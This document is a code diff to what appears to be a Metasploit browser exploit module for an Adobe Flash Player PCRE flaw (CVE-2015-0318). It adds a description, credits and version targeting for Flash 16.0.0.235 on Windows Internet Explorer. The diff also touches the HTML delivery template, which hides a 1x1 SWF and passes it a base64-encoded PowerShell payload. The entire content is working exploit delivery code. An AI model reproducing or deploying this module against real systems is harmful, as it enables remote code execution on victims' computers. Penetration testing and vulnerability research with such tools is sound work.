@@ -17,12 +17,15 @@ def initialize(info={})
17
17
super ( update_info ( info ,
18
18
'Name' => "Adobe Flash Player PCRE Regex Vulnerability" ,
19
19
'Description' => %q{
20
- Flash
20
+ This module exploits a vulnerability found in Adobe Flash Player. A compilation logic error
21
+ in the PCRE engine, specifically in the handling of the \c escape sequence when followed by
22
+ a multi-byte UTF8 character, allows arbitrary execution of PCRE bytecode.
21
23
} ,
22
24
'License' => MSF_LICENSE ,
23
25
'Author' =>
24
26
[
25
- 'Mark Brand' # Found vuln
27
+ 'Mark Brand' , # Found vuln
28
+ 'sinn3r' # MSF
26
29
] ,
27
30
'References' =>
28
31
[
@@ -37,8 +40,7 @@ def initialize(info={})
37
40
} ,
38
41
'DefaultOptions' =>
39
42
{
40
- # 'InitialAutoRunScript' => 'migrate -f',
41
- 'Retries' => false
43
+ 'Retries' => true
42
44
} ,
43
45
'Platform' => 'win' ,
44
46
'BrowserRequirements' =>
@@ -48,7 +50,9 @@ def initialize(info={})
48
50
:method => "LoadMovie" ,
49
51
:os_name => OperatingSystems ::Match ::WINDOWS ,
50
52
:ua_name => Msf ::HttpClients ::IE ,
51
- #:flash => lambda { |ver| ver =~ /^11\.5/ && ver < '11.5.502.149' }
53
+ # Ohter versions are vulnerable but .235 is the one that works for me pretty well
54
+ # So we're gonna limit to this one for now. More validation needed in the future.
55
+ :flash => lambda { |ver | ver =~ /^16\. / && ver <= '16.0.0.235' }
52
56
} ,
53
57
'Targets' =>
54
58
[
@@ -60,6 +64,8 @@ def initialize(info={})
60
64
end
61
65
62
66
def exploit
67
+ # Please see data/exploits/CVE-2015-0318/ for source,
68
+ # that's where the actual exploit is
63
69
@swf = create_swf
64
70
super
65
71
end
@@ -81,7 +87,6 @@ def on_request_exploit(cli, request, target_info)
81
87
end
82
88
83
89
def exploit_template ( cli , target_info )
84
-
85
90
swf_random = "#{ rand_text_alpha ( 4 + rand ( 3 ) ) } .swf"
86
91
target_payload = get_payload ( cli , target_info )
87
92
psh_payload = cmd_psh_payload ( target_payload , 'x86' , { remove_comspec : true } )
@@ -96,18 +101,8 @@ def exploit_template(cli, target_info)
96
101
<param name="Play" value="true" />
97
102
<embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>" Play="true"/>
98
103
</object>
99
-
100
- <script>
101
- function debug_alert(msg) {
102
- console.log(msg);
103
- }
104
-
105
- function debug_print(msg) {
106
- console.log(msg);
107
- }
108
- </script>
109
104
</body>
110
- </html>
105
+ </html>
111
106
|
112
107
113
108
return html_template , binding ( )
0 commit comments